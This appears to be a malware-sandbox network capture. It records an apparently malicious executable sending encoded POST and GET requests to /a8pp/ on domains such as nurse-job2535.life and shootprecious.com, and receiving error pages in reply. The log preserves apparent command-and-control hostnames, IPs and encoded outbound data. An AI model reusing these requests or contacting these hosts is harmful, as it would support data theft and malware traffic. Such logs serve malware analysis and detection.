                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 55 57 34 56 51 38 67 75 44 4a 37 68 31 64 42 75 68 72 37 58 73 4a 2b 64 4c 34 6f 71 68 44 2f 56 76 6a 69 54 4f 44 34 30 6f 34 73 59 4c 42 6d 70 4e 59 36 72 56 77 32 4c 66 63 48 56 45 31 47 77 45 46 47 77 58 33 34 33 43 45 61 75 35 32 57 2f 52 67 65 2b 30 78 4f 51 53 4d 5a 71 45 75 75 5a 6f 57 47 4e 69 6c 56 6b 6d 45 74 51 77 53 50 67 66 56 6e 34 58 77 47 6a 58 61 39 43 68 46 2f 55 77 77 57 43 52 48 37 7a 53 2f 75 32 33 57 32 76 55 42 6d 78 5a 43 42 2b 4f 6f 44 32 72 2f 4b 51 4a 48 42 64 71 41 32 30 31 77 55 6d 74 6d 43 4b 4c 30 78 34 49 71 7a 53 70 74 7a 69 42 4d 55 6b 76 48 62 66 36 47 6d 4b 53 72 58 37 6a 6e 4c 33 66 4a 4b 6b 39 62 45 3d
                                        Data Ascii: 2NlhHLS8=UW4VQ8guDJ7h1dBuhr7XsJ+dL4oqhD/VvjiTOD40o4sYLBmpNY6rVw2LfcHVE1GwEFGwX343CEau52W/Rge+0xOQSMZqEuuZoWGNilVkmEtQwSPgfVn4XwGjXa9ChF/UwwWCRH7zS/u23W2vUBmxZCB+OoD2r/KQJHBdqA201wUmtmCKL0x4IqzSptziBMUkvHbf6GmKSrX7jnL3fJKk9bE=
                                        Jun 4, 2024 14:36:00.238460064 CEST701INHTTP/1.1 405 Not Allowed
                                        date: Tue, 04 Jun 2024 12:36:00 GMT
                                        content-type: text/html
                                        content-length: 556
                                        server: NginX
                                        connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        23192.168.11.304981764.190.62.22807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:36:02.763251066 CEST1289OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.nurse-job2535.life
                                        Origin: http://www.nurse-job2535.life
                                        Referer: http://www.nurse-job2535.life/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 55 57 34 56 51 38 67 75 44 4a 37 68 31 64 42 75 68 72 37 58 73 4a 2b 64 4c 34 6f 71 68 44 2f 56 76 6a 69 54 4f 44 34 30 6f 34 30 59 4c 77 47 70 4e 37 53 72 55 77 32 4c 44 73 48 55 45 31 47 58 45 46 76 35 58 33 6c 56 43 47 53 75 34 56 75 2f 58 56 79 2b 39 78 4f 51 62 73 5a 72 4c 4f 76 62 6f 53 61 4a 69 6c 46 6b 6d 45 74 51 77 52 48 67 62 41 62 34 52 77 47 67 48 71 39 30 71 6c 2f 77 77 78 2b 7a 52 48 32 45 52 50 4f 32 33 32 47 76 56 7a 2b 78 52 43 42 34 4e 6f 44 75 72 2f 48 4f 4a 48 4d 69 71 41 79 4b 31 79 55 6d 73 53 7a 48 5a 6d 46 53 56 62 66 67 30 4f 6a 38 57 61 55 36 78 67 43 35 71 33 69 56 45 66 37 73 67 54 53 74 43 37 32 33 6e 50 5a 54 2f 49 50 35 37 5a 65 35 68 30 65 65 2b 59 64 4a 59 69 34 39 67 37 69 57 44 7a 70 4c 53 5a 35 2b 6e 58 39 41 2f 64 2f 4a 2f 44 36 47 37 53 64 69 54 76 68 31 74 6a 53 49 39 79 44 51 79 45 56 50 31 49 2b 77 41 45 63 43 58 75 35 6e 4b 6c 59 65 67 33 73 58 2f 55 2f 4c 39 33 58 4d 30 63 30 61 46 4d 71 50 30 51 74 52 41 47 63 4a 47 33 42 34 73 [TRUNCATED]
                                        Data Ascii: 2NlhHLS8=UW4VQ8guDJ7h1dBuhr7XsJ+dL4oqhD/VvjiTOD40o40YLwGpN7SrUw2LDsHUE1GXEFv5X3lVCGSu4Vu/XVy+9xOQbsZrLOvboSaJilFkmEtQwRHgbAb4RwGgHq90ql/wwx+zRH2ERPO232GvVz+xRCB4NoDur/HOJHMiqAyK1yUmsSzHZmFSVbfg0Oj8WaU6xgC5q3iVEf7sgTStC723nPZT/IP57Ze5h0ee+YdJYi49g7iWDzpLSZ5+nX9A/d/J/D6G7SdiTvh1tjSI9yDQyEVP1I+wAEcCXu5nKlYeg3sX/U/L93XM0c0aFMqP0QtRAGcJG3B4sgtfRCMcAqCUexAZiiM/wpLhoCw9F1UFh/VN/Y7CxB3Dp3w+HnpLI9osgDDVYjhWl+fXJOFE3PrnSmjllC6JppESmcMhEZsEJ8oVTmRvi7IDvMZLi5amhY39p6Sn4K+Qiu2S7BLxfbq574BCbAUXMdPhq7EscH9j8pE4Eqss9vGjcFpfoCLrfCvo/XX1BwBV5gwERyFh77SRnUVCHEYwQcLB/Q32aNN0DMk48CuJub18+BeG5r2T8gECCqAhoJUBFUSvIQa8AHsVMVnT6m5ZiJu0P12Na8d5KB8dS4I+ZuSogXgedgk8NMCgi7nVrq/+KYj/SzflQE9QJIPNYMHsFlKci08nu+lFp22SF7IdYNezkjBacpAkvpAo07VymJyxyq5YWwU20yMD37Dfyu6PG
                                        Jun 4, 2024 14:36:02.763315916 CEST399OUTData Raw: 31 4a 46 30 71 71 42 6e 4f 78 37 64 51 33 57 34 53 72 32 59 79 44 38 4f 2b 74 76 69 6b 37 79 74 6a 45 4e 57 74 49 38 65 34 72 73 51 73 37 48 35 69 69 2f 45 30 47 4c 52 59 45 41 76 6e 52 4e 56 34 41 49 54 47 32 72 4c 6c 72 49 35 31 63 76 6b 71 43
                                        Data Ascii: 1JF0qqBnOx7dQ3W4Sr2YyD8O+tvik7ytjENWtI8e4rsQs7H5ii/E0GLRYEAvnRNV4AITG2rLlrI51cvkqCYZnY3xXjVahG77G/daGDKVd1lL52/FcTFhS1vUXO1hPkJP6sbNiGxZVzbRfagy9QCqwSp0Eu6CBpHorw+JyTi5I0xo2kHeVLBTc5YEG/QtHpyTGJaMe1/+fpflsJakaaW16tzzkVPy2PXK0GXz9ig6DBqnn+Yct5O
                                        Jun 4, 2024 14:36:02.988218069 CEST701INHTTP/1.1 405 Not Allowed
                                        date: Tue, 04 Jun 2024 12:36:02 GMT
                                        content-type: text/html
                                        content-length: 556
                                        server: NginX
                                        connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        24192.168.11.304981864.190.62.22807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:36:05.512490034 CEST472OUTGET /a8pp/?2NlhHLS8=ZUQ1TL0seNvx54VLi4j8goKVXeEHsH3HvniJXC80qaRkGy2/Bav7bR6THbfzZ3GDEHeASBxbKXGg0EinUgac1wLiet4LPvLUzSGHrF52u0MP0A2xTBnpXUY=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.nurse-job2535.life
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:36:05.740421057 CEST107INHTTP/1.1 436
                                        date: Tue, 04 Jun 2024 12:36:05 GMT
                                        content-length: 0
                                        server: NginX
                                        connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        25192.168.11.304981923.227.38.74807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:36:11.113908052 CEST748OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.shootprecious.com
                                        Origin: http://www.shootprecious.com
                                        Referer: http://www.shootprecious.com/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 55 6f 49 78 44 41 45 4e 56 36 49 56 79 6e 77 6e 59 68 57 66 35 58 4b 43 56 4b 47 35 71 36 5a 7a 66 75 4b 79 42 78 4c 57 46 37 46 63 61 58 44 43 31 49 56 63 4a 48 4c 57 66 37 55 46 68 6c 36 30 44 44 34 79 70 34 4c 76 49 69 4e 4b 51 69 41 74 74 69 50 79 69 73 69 67 71 2b 4f 5a 6e 4e 57 71 45 39 2b 52 6f 48 76 39 71 72 54 56 63 66 30 52 54 2f 65 46 67 56 45 48 63 55 67 6f 6a 71 6f 39 54 36 65 44 49 36 61 58 4c 6d 48 59 54 63 47 61 43 69 53 4f 44 74 43 77 79 36 43 32 39 37 76 68 51 70 41 61 77 57 49 5a 36 2f 51 44 68 77 4f 2b 44 48 69 50 68 45 53 2f 47 4e 6a 4e 4b 48 53 56 39 51 3d 3d
                                        Data Ascii: 2NlhHLS8=UoIxDAENV6IVynwnYhWf5XKCVKG5q6ZzfuKyBxLWF7FcaXDC1IVcJHLWf7UFhl60DD4yp4LvIiNKQiAttiPyisigq+OZnNWqE9+RoHv9qrTVcf0RT/eFgVEHcUgojqo9T6eDI6aXLmHYTcGaCiSODtCwy6C297vhQpAawWIZ6/QDhwO+DHiPhES/GNjNKHSV9Q==
                                        Jun 4, 2024 14:36:11.351511955 CEST1289INHTTP/1.1 402 Payment Required
                                        Date: Tue, 04 Jun 2024 12:36:11 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        X-Sorting-Hat-PodId: 169
                                        X-Sorting-Hat-ShopId: 29847355437
                                        x-frame-options: DENY
                                        x-shopid: 29847355437
                                        x-shardid: 169
                                        x-request-id: 865b2eef-3429-407b-b813-9d6ff8e4cf9b-1717504571
                                        server-timing: processing;dur=33
                                        content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=865b2eef-3429-407b-b813-9d6ff8e4cf9b-1717504571
                                        x-content-type-options: nosniff
                                        x-download-options: noopen
                                        x-permitted-cross-domain-policies: none
                                        x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=865b2eef-3429-407b-b813-9d6ff8e4cf9b-1717504571
                                        x-dc: gcp-us-east1,gcp-us-central1,gcp-us-central1
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZYmq2LU8gCIJWWZEZfSEjqvl6WGwRSDIbE0UndZhM7y30BkB6hI0Wjm5Xn0AGGYmfbq78iNnIp9pZbO4kOlQLv1ZdeDK3ZLzUl1dtt3Sy2Jwr2mCy%2Fc1aY%2FO8C89ln6%2
                                        Data Raw:
                                        Data Ascii:
                                        Jun 4, 2024 14:36:11.351542950 CEST257INData Raw: 68 63 61 45 72 36 36 49 7a 51 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30
                                        Data Ascii: hcaEr66IzQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=111.999750Server: cloudflareCF-RAY: 88e7f791dae212db-ATLalt-svc: h3=":443"
                                        Jun 4, 2024 14:36:11.351600885 CEST1289INData Raw: 39 35 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 53 6f 6d
                                        Data Ascii: 95f<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Something went wrong.</title> <meta name="referrer" content="never" /> <style type="text/css"> * { border:0; margin:0; padding:0; -moz-box-sizing:border-
                                        Jun 4, 2024 14:36:11.351627111 CEST1117INData Raw: 77 72 61 70 70 65 72 20 7b 20 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 20 6d 61 78 2d 77 69 64 74 68 3a 36 35 30 70 78 3b 20 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 20 70 61 64 64 69 6e 67 3a 32 30 70 78 3b 20 7d 0a 0a 20 20 20 20 20 20
                                        Data Ascii: wrapper { min-width:320px; max-width:650px; margin:0 auto; padding:20px; } .hero { margin-bottom:30px; } .content--block { position:relative; margin-bottom:50px; } .content--desc { margin-bottom:32px; position:relative; }
                                        Jun 4, 2024 14:36:11.353851080 CEST1289INData Raw: 66 66 61 0d 0a 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3a 73 6b 65 74 63 68 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 6f 68 65 6d 69 61 6e 63 6f 64 69 6e 67 2e 63 6f
                                        Data Ascii: ffaink="http://www.w3.org/1999/xlink" xmlns:sketch="http://www.bohemiancoding.com/sketch/ns"> <g id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd" sketch:type="MSPage"> <g id="temporary-errors" sketch:t
                                        Jun 4, 2024 14:36:11.353969097 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 37 31 2e 31 31 36 30 31 32 34 2c 34 32 2e 38 36 38 35 32 38 33 20 4c 31 33 35 2e 37 34 34 30 36 35 2c 33 37 2e 32 36 38 38 33 30 32 22 20 69 64 3d 22 46 69 6c 6c 2d 36 22 20 66 69 6c 6c 3d
                                        Data Ascii: <path d="M71.1160124,42.8685283 L135.744065,37.2688302" id="Fill-6" fill="#FFFFFF" sketch:type="MSShapeGroup"></path> <path d="M71.1160124,42.8685283 L135.744065,37.2688302" id="Stroke-7" stroke="#B4B5B4" stroke-width="2"
                                        Jun 4, 2024 14:36:11.353981972 CEST1289INData Raw: 37 33 35 38 20 31 34 38 2e 34 31 38 32 36 36 2c 34 32 2e 36 31 33 38 31 31 33 20 4c 31 34 38 2e 34 31 38 32 36 36 2c 34 32 2e 36 31 33 38 31 31 33 20 5a 22 20 69 64 3d 22 53 74 72 6f 6b 65 2d 38 22 20 73 74 72 6f 6b 65 3d 22 23 42 34 42 35 42 34
                                        Data Ascii: 7358 148.418266,42.6138113 L148.418266,42.6138113 Z" id="Stroke-8" stroke="#B4B5B4" stroke-width="2" stroke-linecap="round" sketch:type="MSShapeGroup"></path> <path d="M205.044344,43.8398491 L4.39898452,61.2733585" id="Fill-9" fill
                                        Jun 4, 2024 14:36:11.353991032 CEST230INData Raw: 31 31 33 2e 36 32 34 31 35 31 20 43 38 32 2e 39 33 30 34 38 36 31 2c 31 30 38 2e 35 39 30 39 34 33 20 38 30 2e 33 38 35 38 38 32 34 2c 31 30 36 2e 30 33 39 30 31 39 20 37 36 2e 39 39 37 38 32 33 35 2c 31 30 36 2e 30 33 39 30 31 39 20 43 37 34 2e
                                        Data Ascii: 113.624151 C82.9304861,108.590943 80.3858824,106.039019 76.9978235,106.039019 C74.3474489,106.039019 72.0360836,107.642038 71.6150341,107.951094 C69.6250495,112.722792 67.8811858,114.945962 66.1312198,114.945962 C64.4626161,114.
                                        Jun 4, 2024 14:36:11.355918884 CEST1289INData Raw: 31 30 30 36 0d 0a 39 34 35 39 36 32 20 36 33 2e 32 36 35 32 33 35 33 2c 31 31 32 2e 39 37 34 31 31 33 20 36 32 2e 31 30 37 31 37 39 36 2c 31 31 31 2e 30 36 36 37 39 32 20 43 36 31 2e 38 38 32 37 35 35 34 2c 31 31 30 2e 36 39 37 32 38 33 20 36 31
                                        Data Ascii: 1006945962 63.2652353,112.974113 62.1071796,111.066792 C61.8827554,110.697283 61.6617214,110.333208 61.4420433,109.993585 C60.9314954,109.202943 60.7992817,108.364075 61.0494706,107.500755 C61.7539319,105.073811 65.3128514,103.209962 66.1291
                                        Jun 4, 2024 14:36:11.356025934 CEST1289INData Raw: 2c 31 32 33 2e 30 30 32 34 39 31 20 39 34 2e 30 35 34 37 33 36 38 2c 31 33 33 2e 35 34 39 31 33 32 20 38 38 2e 34 30 30 30 36 31 39 2c 31 34 31 2e 38 33 32 35 32 38 20 43 38 32 2e 38 38 37 37 37 30 39 2c 31 34 39 2e 39 30 38 30 37 35 20 37 33 2e
                                        Data Ascii: ,123.002491 94.0547368,133.549132 88.4000619,141.832528 C82.8877709,149.908075 73.2619412,154.924302 63.2801517,154.924302 C61.1654118,154.924302 59.0628762,154.696755 57.0308545,154.247774 C55.1859659,153.840226 53.4271858,153.633736 51.80400
                                        Jun 4, 2024 14:36:11.356050968 CEST1289INData Raw: 37 33 35 30 39 20 43 38 30 2e 31 33 30 39 34 37 34 2c 31 34 35 2e 37 37 33 35 30 39 20 38 38 2e 38 38 36 32 30 31 32 2c 31 32 35 2e 39 31 33 30 35 37 20 38 34 2e 38 37 39 31 31 31 35 2c 31 31 33 2e 35 31 38 38 36 38 20 43 38 32 2e 38 37 38 39 35
                                        Data Ascii: 73509 C80.1309474,145.773509 88.8862012,125.913057 84.8791115,113.518868 C82.8789567,107.330943 79.7465108,105.699396 76.9978235,105.699396 C73.9284334,105.699396 71.3377245,107.735094 71.3377245,107.735094 C69.1972198,112.892604 67.525904,114


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        26192.168.11.304982023.227.38.74807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:36:13.775433064 CEST768OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.shootprecious.com
                                        Origin: http://www.shootprecious.com
                                        Referer: http://www.shootprecious.com/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 55 6f 49 78 44 41 45 4e 56 36 49 56 7a 48 67 6e 56 67 57 66 34 33 4b 42 4c 36 47 35 6a 61 59 62 66 75 32 79 42 7a 6d 4f 45 4f 64 63 61 33 54 43 36 73 4a 63 4f 48 4c 57 56 62 55 41 73 46 36 2f 44 44 30 4c 70 34 33 76 49 69 5a 4b 51 6a 77 74 75 56 37 78 6a 38 69 69 79 4f 4f 48 36 39 57 71 45 39 2b 52 6f 48 4c 58 71 76 2f 56 63 76 45 52 54 61 69 47 73 31 45 41 4b 6b 67 6f 77 36 6f 35 54 36 65 39 49 37 47 74 4c 6b 76 59 54 64 61 61 42 7a 53 4e 49 74 43 79 76 71 44 45 34 59 4b 46 4a 71 38 37 2b 32 6b 68 31 63 49 77 70 48 2f 6b 65 45 57 4e 79 6b 75 53 61 4d 4f 6c 49 46 54 4f 67 62 75 74 4f 6b 51 30 37 78 35 6d 34 6f 6b 71 75 4f 59 57 48 61 34 3d
                                        Data Ascii: 2NlhHLS8=UoIxDAENV6IVzHgnVgWf43KBL6G5jaYbfu2yBzmOEOdca3TC6sJcOHLWVbUAsF6/DD0Lp43vIiZKQjwtuV7xj8iiyOOH69WqE9+RoHLXqv/VcvERTaiGs1EAKkgow6o5T6e9I7GtLkvYTdaaBzSNItCyvqDE4YKFJq87+2kh1cIwpH/keEWNykuSaMOlIFTOgbutOkQ07x5m4okquOYWHa4=
                                        Jun 4, 2024 14:36:14.020210981 CEST1289INHTTP/1.1 402 Payment Required
                                        Date: Tue, 04 Jun 2024 12:36:13 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        X-Sorting-Hat-PodId: 169
                                        X-Sorting-Hat-ShopId: 29847355437
                                        x-frame-options: DENY
                                        x-shopid: 29847355437
                                        x-shardid: 169
                                        x-request-id: 3385c228-588c-422d-8655-d8a667a2c65c-1717504573
                                        server-timing: processing;dur=12
                                        content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=3385c228-588c-422d-8655-d8a667a2c65c-1717504573
                                        x-content-type-options: nosniff
                                        x-download-options: noopen
                                        x-permitted-cross-domain-policies: none
                                        x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=3385c228-588c-422d-8655-d8a667a2c65c-1717504573
                                        x-dc: gcp-us-east1,gcp-us-central1,gcp-us-central1
                                        CF-Cache-Status: DYNAMIC
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XgBu%2FQsC5sbTPvNaNghq3AIByX24tCEcGIbE27zjpjC1AGGszonKEf%2B%2BImagyzUsUSXzYdTcx6Ve3f%2BfbTQvTsxs4NVOZuGnlNSfIf140IkzACM5HHx3uAxMoYtVd
                                        Data Raw:
                                        Data Ascii:
                                        Jun 4, 2024 14:36:14.020225048 CEST259INData Raw: 53 46 79 4f 78 72 78 31 77 47 75 41 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22
                                        Data Ascii: SFyOxrx1wGuA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=112.999916Server: cloudflareCF-RAY: 88e7f7a28f9e9add-MIAalt-svc: h3=":44
                                        Jun 4, 2024 14:36:14.020258904 CEST1289INData Raw: 39 36 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 53 6f 6d
                                        Data Ascii: 960<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Something went wrong.</title> <meta name="referrer" content="never" /> <style type="text/css"> * { border:0; margin:0; padding:0; -moz-box-sizing:border-
                                        Jun 4, 2024 14:36:14.020270109 CEST1118INData Raw: 77 72 61 70 70 65 72 20 7b 20 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 20 6d 61 78 2d 77 69 64 74 68 3a 36 35 30 70 78 3b 20 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 20 70 61 64 64 69 6e 67 3a 32 30 70 78 3b 20 7d 0a 0a 20 20 20 20 20 20
                                        Data Ascii: wrapper { min-width:320px; max-width:650px; margin:0 auto; padding:20px; } .hero { margin-bottom:30px; } .content--block { position:relative; margin-bottom:50px; } .content--desc { margin-bottom:32px; position:relative; }
